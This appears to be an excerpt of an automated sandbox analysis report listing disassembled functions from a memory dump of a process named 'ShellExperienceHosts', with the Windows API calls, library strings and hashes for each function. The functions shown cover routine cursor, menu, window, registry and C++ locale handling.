Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: 99eb7378bedb178b7b26c4d49e2c5cf596c13d4d5f6fd7e270f2cbf1de0aa61c
Instruction ID: c8d5ae19e058604a4f0606efad78b2f3bcb24b6399d45be7e101ca7fe715e323
Opcode Fuzzy Hash: 99eb7378bedb178b7b26c4d49e2c5cf596c13d4d5f6fd7e270f2cbf1de0aa61c
Instruction Fuzzy Hash: 9221A672605218BADF11AB61CE44FEF7A79AFA1704F100255F819F2A81DF70CE45CB51

Function 6C9C5B7B Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C9D4C03: EnterCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C34
Part of subcall function 6C9D4C03: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C4A
Part of subcall function 6C9D4C03: LeaveCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C58
Part of subcall function 6C9D4C03: EnterCriticalSection.KERNEL32(00000000,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D4C65

SetCursor.USER32(00000009), ref: 6C9C5BC5
LoadCursorW.USER32(?,00007905), ref: 6C9C5C0A
LoadCursorW.USER32(00000000,00007F85), ref: 6C9C5C20
SetCursor.USER32(00000000,?,00000009), ref: 6C9C5C39
DestroyCursor.USER32(00000000), ref: 6C9C5C44

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Cursor$CriticalSection$EnterLoad$DestroyInitializeLeave
String ID:
API String ID: 900973665-0
Opcode ID: b10e062fddaf4eff753ccdbdeee8e2ec300b54cf82e0bcf57eeeec02475e9648
Instruction ID: f1716d779f6bf6ad41ffaef0baee18882bc9d892becfb116905c29b69ded0448
Opcode Fuzzy Hash: b10e062fddaf4eff753ccdbdeee8e2ec300b54cf82e0bcf57eeeec02475e9648
Instruction Fuzzy Hash: 9311DF71B462499FEB505BA5E884A593A3CEB77318F164433E10DD7A44D768E8009B53

Function 6C9CE438 Relevance: 7.6, APIs: 5, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32(00000000,?), ref: 6C9CE45C
RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 6C9CE47C
RegCloseKey.ADVAPI32(00000000), ref: 6C9CE4AD

Part of subcall function 6C9CDCB4: RegCloseKey.ADVAPI32(00000000), ref: 6C9CDD59
Part of subcall function 6C9CDCB4: RegCloseKey.ADVAPI32(00000000), ref: 6C9CDD68

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,00000000,?,00000000), ref: 6C9CE4A4
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C9CE4C8

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Close$DeleteValue$PrivateProfileStringWrite
String ID:
API String ID: 222425065-0
Opcode ID: 6f370db62b1a321f31aa1ffa8421f9a176f2911bb36097096589e1526aabd3e3
Instruction ID: 7a762fc9c0d20a348a206dd862f66529c09aba0cd0e32fc2a4ecbd393c455a65
Opcode Fuzzy Hash: 6f370db62b1a321f31aa1ffa8421f9a176f2911bb36097096589e1526aabd3e3
Instruction Fuzzy Hash: 5011E032701659BBCB224F648C45E9F3B3DAF4A7A4F108424F90A9BA00CB39C801C7E3

Function 6C9F2542 Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00004212,00000001), ref: 6C9F2574
EnableMenuItem.USER32(?,00004213,00000000), ref: 6C9F2585
EnableMenuItem.USER32(?,00004214,00000000), ref: 6C9F25B4
CheckMenuItem.USER32(?,00004213,00000008), ref: 6C9F25DA
CheckMenuItem.USER32(?,00004214,00000000), ref: 6C9F25E6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ItemMenu$Enable$Check
String ID:
API String ID: 1852492618-0
Opcode ID: 33ce923ea639cf8dd87d512243bd5f3a95821c53430feec7a4cee19cdc8cb6d9
Instruction ID: debf3116329ea05818a9a87ab1028cdd5525dae53cc607596dfcfd39bf91d0eb
Opcode Fuzzy Hash: 33ce923ea639cf8dd87d512243bd5f3a95821c53430feec7a4cee19cdc8cb6d9
Instruction Fuzzy Hash: 4C11BB71341A45AFEB128B24DD89B16B7B8FF26759F408425B11A968A0C770EC218B60

Function 6C9C0A07 Relevance: 7.6, APIs: 5, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 6C9C0A7C
GlobalAddAtomW.KERNEL32(?), ref: 6C9C0A89
GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 6C9C0AA3
GlobalAddAtomW.KERNEL32(?), ref: 6C9C0AB0
SendMessageW.USER32(00000000,000003E4,00000000,?), ref: 6C9C0AD5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: a243b3486e44897a9eeb193eeed6e7dfcb904e4eb00a46c8b2da720e64d87994
Instruction ID: 85c526ba2e04efea30f66e03298214d2d7326ba1d0a639254629c7b3f0ed48d0
Opcode Fuzzy Hash: a243b3486e44897a9eeb193eeed6e7dfcb904e4eb00a46c8b2da720e64d87994
Instruction Fuzzy Hash: 23219FB1701748EBEB109F64C848BAA73BCEF05704F10811AB86A97441D774E984CB52

Function 6C9F0341 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9F0348
GetWindowRect.USER32(00000000,00000000), ref: 6C9F0391
CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6C9F03BB
SetWindowRgn.USER32(00000000,?,00000000), ref: 6C9F03D1
SetWindowRgn.USER32(00000000,00000000,00000000), ref: 6C9F03E9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Rect$CreateH_prolog3_Round
String ID:
API String ID: 2502471913-0
Opcode ID: 3771b1c2483172f19b618e7162ae46fae24934364ee10786b67d9d5c75f1ad40
Instruction ID: 51f478d0fbe841733e04da2fcf4097e3ca9bf5eba44fbac7518a5f18cdc63da1
Opcode Fuzzy Hash: 3771b1c2483172f19b618e7162ae46fae24934364ee10786b67d9d5c75f1ad40
Instruction Fuzzy Hash: 39114C71A00599EFDF05CFA4C9C4AEDBB78FF19308F101219E51673A50DBB49955CB60

Function 6C9C9A65 Relevance: 7.6, APIs: 5, Instructions: 56windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000080), ref: 6C9C9A6E
SendMessageW.USER32(00000080,00000420,00000000,6C9B4555), ref: 6C9C9A92
SendMessageW.USER32(00000080,0000041F,00000000,?), ref: 6C9C9AAF
SendMessageW.USER32(00000080,0000043A,00000000,00000000), ref: 6C9C9ACB
InvalidateRect.USER32(00000080,00000000,00000001,?,6C9C9223,?,?,?,?,00000000,?,?,?,?,?,6C9B4555), ref: 6C9C9AE9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: d5e045d751a8d8f6ce6bb65c79b5adb2c9920edc1f2b2ebef37c4418a2029360
Instruction ID: c8768abd3b518e81e6c93bec3266be1fb14d0928524610e821e95050a3f32a18
Opcode Fuzzy Hash: d5e045d751a8d8f6ce6bb65c79b5adb2c9920edc1f2b2ebef37c4418a2029360
Instruction Fuzzy Hash: 9D113071204794ABEB248F25D808ABB7BF5FF85741F00892EF99A96650E770A850DB20

Function 6C9F8715 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6C9F872A
ScreenToClient.USER32(?,?), ref: 6C9F8737
PtInRect.USER32(?,?,?), ref: 6C9F874A
LoadCursorW.USER32(00000000,00007F86), ref: 6C9F876C
SetCursor.USER32(?), ref: 6C9F878A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Cursor$ClientLoadRectScreen
String ID:
API String ID: 2747913190-0
Opcode ID: 0c0aec3a07cbd2f66783266c5725dc1fe8f3a18909fecb6d7507a39b5dbab9d2
Instruction ID: 226f41a440529533c759f6999de166d43ed3c1b5ca54ec15403b32801d558052
Opcode Fuzzy Hash: 0c0aec3a07cbd2f66783266c5725dc1fe8f3a18909fecb6d7507a39b5dbab9d2
Instruction Fuzzy Hash: 56018B72A00249EFDF215FA1DC08DEE7FB8EF5A614F00406AE52997610EB309501DB62

Function 6C9C4D68 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6C9C4D73

Part of subcall function 6C9D845D: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 6C9D84A4
Part of subcall function 6C9D845D: CreatePatternBrush.GDI32(00000000), ref: 6C9D84B1
Part of subcall function 6C9D845D: DeleteObject.GDI32(00000000), ref: 6C9D84BD

SelectObject.GDI32(?,?), ref: 6C9C4D92
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 6C9C4DB7
SelectObject.GDI32(?,00000000), ref: 6C9C4DC5
ReleaseDC.USER32(?,?), ref: 6C9C4DD1

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object$CreateSelect$BitmapBrushDeletePatternRelease
String ID:
API String ID: 2474928807-0
Opcode ID: 386c1d7400d21b628af7ce206632ac789a8e3c882d7ebda5c21c137fb2e03dfd
Instruction ID: e2810127bced428b90edeb99f28174596bab8f16bc1a8d11461f952eb3f0fd38
Opcode Fuzzy Hash: 386c1d7400d21b628af7ce206632ac789a8e3c882d7ebda5c21c137fb2e03dfd
Instruction Fuzzy Hash: 62012832200640AFCB119FA9ED48C6ABFB9FF5A7453118569F91EC7521CB33E811DB60

Function 6CAF628F Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CAF6296
std::_Lockit::_Lockit.LIBCPMT ref: 6CAF62A1
std::_Lockit::~_Lockit.LIBCPMT ref: 6CAF630F

Part of subcall function 6CAF63F3: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CAF640B

std::locale::_Setgloballocale.LIBCPMT ref: 6CAF62BC
_Yarn.LIBCPMT ref: 6CAF62D2

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 48a5219175da88d77619ec448c6b83af973a573b9def73d04a12d8566f518a66
Instruction ID: 3daae0527fd44d0ba84bd73ec2d7a8dc4f9faf23331e9351878eabce213a88ad
Opcode Fuzzy Hash: 48a5219175da88d77619ec448c6b83af973a573b9def73d04a12d8566f518a66
Instruction Fuzzy Hash: 8801DF35B001619BDB06DF20CA409BC7771BF8A254F144008F82197B80CF78AA8FCBC1

Function 6C9DFAFC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9DFB03
LoadCursorW.USER32(00000000,00007F00), ref: 6C9DFB27
GetClassInfoW.USER32(?,?,?), ref: 6C9DFB62

Part of subcall function 6C9B7E19: __EH_prolog3_catch.LIBCMT ref: 6C9B7E20
Part of subcall function 6C9B7E19: GetClassInfoW.USER32(?,?,00000030), ref: 6C9B7E32

Strings

%Ts:%x:%x:%x:%x, xrefs: 6C9DFB4D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClassInfo$CursorH_prolog3H_prolog3_catchLoad
String ID: %Ts:%x:%x:%x:%x
API String ID: 937286869-4057404147
Opcode ID: ddd52db7611cac954faa470bcf4b89a423e39133f5495f00aafc2c3a5d24b2ab
Instruction ID: dc27f52352d66b812d05956e98ed7fd80ecde66e5985fca647dc338977e87357
Opcode Fuzzy Hash: ddd52db7611cac954faa470bcf4b89a423e39133f5495f00aafc2c3a5d24b2ab
Instruction Fuzzy Hash: 4C71A871E00619AFDB01DFA8D9819EEBBF9FF58308F118529E914B7700DB70EA458B94

Function 6C9A60A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9A6110
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C9A619C
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9A6231

Strings

bad locale name, xrefs: 6C9A624A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3553999535-1405518554
Opcode ID: 37fe701181682bedbdb8917a9b5aae065ec791968ce6845bed97eab8a96557c5
Instruction ID: adf756ca891ef8deb12847419b73cc26588509acf07fb97e956785f48c0a1826
Opcode Fuzzy Hash: 37fe701181682bedbdb8917a9b5aae065ec791968ce6845bed97eab8a96557c5
Instruction Fuzzy Hash: CC5170F1D016449BEB00CFE8D9417DEBBB8AF04318F144169E825E7B40E775DA4ACBA1

Function 6C9AB810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9AB880
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C9AB90C
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9AB9A1

Strings

bad locale name, xrefs: 6C9AB9BA

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3553999535-1405518554
Opcode ID: 75a4118ad901ef22000165cd6481299a5055cabb41842742f675b49c83fd735c
Instruction ID: 1783216d06ea09d13546b0f8d8d54558f9b36f43f747966640e4e93ec21f18c8
Opcode Fuzzy Hash: 75a4118ad901ef22000165cd6481299a5055cabb41842742f675b49c83fd735c
Instruction Fuzzy Hash: 46416EB1D01248EBEB00CFE8C945BDEBBB8AF14358F144169E814E7780E775D94ACBA1

Function 6C9AE090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9AE100
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C9AE18C
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9AE221

Strings

bad locale name, xrefs: 6C9AE23A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3553999535-1405518554
Opcode ID: 533699fde10896b01dc33ec4e1f8d0a45647ff4ec29f53f31f928a0cbee78c9d
Instruction ID: 0c0b24db7840d05e0f17d2975d4b5d5f2668c2fac7460a9433bfc78eca06ab33
Opcode Fuzzy Hash: 533699fde10896b01dc33ec4e1f8d0a45647ff4ec29f53f31f928a0cbee78c9d
Instruction Fuzzy Hash: AE51A3F1D01258DBEB00CFE8D944BDEBBB8AF04318F140169E814A7780E775DA5ACBA1

Function 6C9EEA1E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9EEA97

Strings

MFCToolBars, xrefs: 6C9EEAA4
%TsMFCToolBar-%d%x, xrefs: 6C9EEAF8
%TsMFCToolBar-%d, xrefs: 6C9EEAE1

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3
String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$MFCToolBars
API String ID: 431132790-2016111687
Opcode ID: 401ff44e39c0e4e4e185dc11f15b904e36072330e139051e42d6fa32d3b3eaa0
Instruction ID: b86e37837b91c058f5ac6f1d9d0f080b9b005e1ec42c0afdefa5395b67f03492
Opcode Fuzzy Hash: 401ff44e39c0e4e4e185dc11f15b904e36072330e139051e42d6fa32d3b3eaa0
Instruction Fuzzy Hash: 3C41B775A0012AEBDF05DFA4C9849EFB7B9BF65318F100569D816A7780DB70DD09CBA0

Function 6C9A2FC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6C9A305F

Part of subcall function 6CAF821E: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C9A2D73,6CB6672D,?,?,6CAF60E4,6C9A2D73,6CB819B8,?,6C9A2D73,bad locale name), ref: 6CAF827F

Strings

ios_base::badbit set, xrefs: 6C9A2FF7, 6C9A3022, 6C9A3043
ios_base::eofbit set, xrefs: 6C9A3006
ios_base::failbit set, xrefs: 6C9A2F18, 6C9A3001

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
